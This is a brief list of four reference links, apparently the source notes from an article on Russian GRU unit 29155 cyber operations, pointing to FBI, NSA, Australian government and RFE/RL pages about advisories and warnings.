    [1] https://www.fbi.gov/wanted/cyber/gru-29155-cyber-actors

    [2] https://www.nsa.gov/Press-Room/Press-Releases-Statements/Press-Release-View/Article/3895808/

    [3] https://www.cyber.gov.au/about-us/view-all-content/alerts-and-advisories/russian-military-cyber-actors-target-us-and-global-critical-infrastructure

    [4] https://www.rferl.org/a/germany-gru-russia-cyber-warning/33112764.html